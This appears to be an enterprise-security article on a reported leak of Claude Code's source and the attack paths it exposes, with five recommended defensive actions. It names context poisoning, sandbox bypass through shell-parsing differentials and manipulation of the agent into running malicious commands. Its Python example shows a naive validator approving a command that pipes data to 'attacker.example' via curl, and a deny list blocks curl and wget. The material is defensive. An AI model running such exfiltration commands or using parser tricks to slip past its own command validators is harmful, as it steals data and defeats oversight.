In the wake of Claude Code's source code leak, 5 actions enterprise security leaders should take now
Anthropic, the AI company behind the Claude family of models and coding agents, recently made headlines after accidentally shipping a 59.8 MB source map file in version 2.1.88 of its @anthropic-ai/claude-code npm package. The mistake exposed 512,000 lines of unobfuscated TypeScript across 1,906 files, revealing sensitive internals including the permission model, security validators, unreleased feature flags, and references to upcoming models.
Security researcher Chaofan Shou discovered the exposure and shared it on X, after which mirror repositories spread rapidly across GitHub. Anthropic confirmed the leak was caused by human error and involved no customer data or model weights. Early containment efforts failed, however, prompting the company to file copyright takedown requests to remove unauthorized copies from GitHub.
The leaked code offered a detailed look at the architecture of Claude Code, Anthropic's AI coding agent. It revealed the agentic harness that lets the model interact with tools, manage files, execute commands, and orchestrate workflows. Competitors and startups now have a roadmap for replicating Claude Code's features, eroding its competitive differentiation.
The leak also made three potential attack paths cheaper to exploit: context poisoning through the compaction pipeline, sandbox bypass via shell-parsing differentials, and a composition attack that manipulates the model into executing malicious commands.
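To see why a shell-parsing differential is dangerous, consider a minimal sketch in Python. The validator logic and allow-list below are hypothetical illustrations, not Anthropic's actual code: the point is that a validator which tokenizes a command differently from the shell that ultimately runs it can be tricked into approving a compound command.

```python
import shlex

# Hypothetical allow-list of binaries a validator considers safe.
SAFE_BINARIES = {"echo", "ls", "cat"}

def naive_validator_approves(command: str) -> bool:
    """Approve a command if its first token is a known-safe binary.

    This mimics a naive bash security validator. shlex.split (with
    default settings) does NOT treat ';' as a command separator, so
    it sees one logical command where bash would see two.
    """
    tokens = shlex.split(command)
    return bool(tokens) and tokens[0] in SAFE_BINARIES

# The validator and the real shell parse this string differently:
# shlex folds ';' into the word "safe;", so the validator sees only
# an "echo" invocation -- but bash would split on ';' and also run curl.
cmd = "echo safe; curl https://attacker.example/exfil"
print(naive_validator_approves(cmd))  # prints True: the compound command is approved
```

Any mismatch like this between the parser used for validation and the shell used for execution is a differential an attacker can probe for, which is exactly why the exposed validator source lowers the cost of finding one.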
Security experts stressed the need to audit the layers the leak exposed: the compaction pipeline, the bash security validators, the MCP server interface contract, feature flags, anti-distillation mechanisms, and undercover mode. Their recommended actions included auditing cloned repositories, treating MCP servers as untrusted dependencies, restricting overly broad permission rules, and verifying commit provenance for AI-assisted code.
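Restricting broad permission rules is something teams can do today in project-level settings. The fragment below is an illustrative sketch of a `.claude/settings.json`; the exact rule strings follow Claude Code's documented `Tool(pattern)` permission syntax, but the specific commands chosen are assumptions you would adapt to your own policy. It denies network-fetch commands outright and scopes bash approval to named commands rather than a blanket allow:

```json
{
  "permissions": {
    "deny": [
      "Bash(curl:*)",
      "Bash(wget:*)"
    ],
    "allow": [
      "Bash(git diff:*)",
      "Bash(npm run test:*)"
    ]
  }
}
```

The design principle is the same as any allow-list: every rule should name the narrowest command pattern that still lets the agent do its job.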
The incident underscores the broader risks of AI-assisted development; GitGuardian's research, for example, has reported elevated rates of secret leaks in AI-assisted commits. Gartner advised organizations to demand operational maturity from AI tool vendors, including SLAs, uptime history, and incident response policies, and to build provider-independent integration boundaries so no single vendor failure cascades through the toolchain.
Security leaders were urged to act immediately on five fronts: audit project configuration files, monitor MCP servers, restrict bash permissions, demand vendor accountability, and implement commit provenance verification. The leak is a cautionary tale for enterprises relying on AI-generated code and underscores the need for robust security controls across AI development workflows.
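As a concrete starting point for the configuration-audit action, a small script can sweep a codebase for blanket bash permissions. Everything here is a hypothetical sketch: the `.claude/settings.json` path and the `permissions.allow` layout follow Claude Code's settings convention, and the set of "too broad" rule strings is an assumption you would tune to your own policy.

```python
import json
from pathlib import Path

# Illustrative patterns an auditor might treat as dangerously broad.
BROAD_RULES = {"Bash", "Bash(*)", "Bash(*:*)"}

def find_broad_bash_rules(repo_root: str) -> list[tuple[str, str]]:
    """Return (settings-file path, rule) pairs for blanket bash permissions.

    Walks repo_root for .claude/settings.json files and flags any
    allow-list entry that matches one of the broad patterns above.
    """
    findings: list[tuple[str, str]] = []
    for settings_path in Path(repo_root).rglob(".claude/settings.json"):
        try:
            settings = json.loads(settings_path.read_text())
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or malformed file: skip, don't abort the audit
        for rule in settings.get("permissions", {}).get("allow", []):
            if rule in BROAD_RULES:
                findings.append((str(settings_path), rule))
    return findings
```

Run on a monorepo checkout, this gives security teams a cheap inventory of which projects have effectively opted out of command-level restrictions, which is the natural first target after a leak that exposed how those restrictions are enforced.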



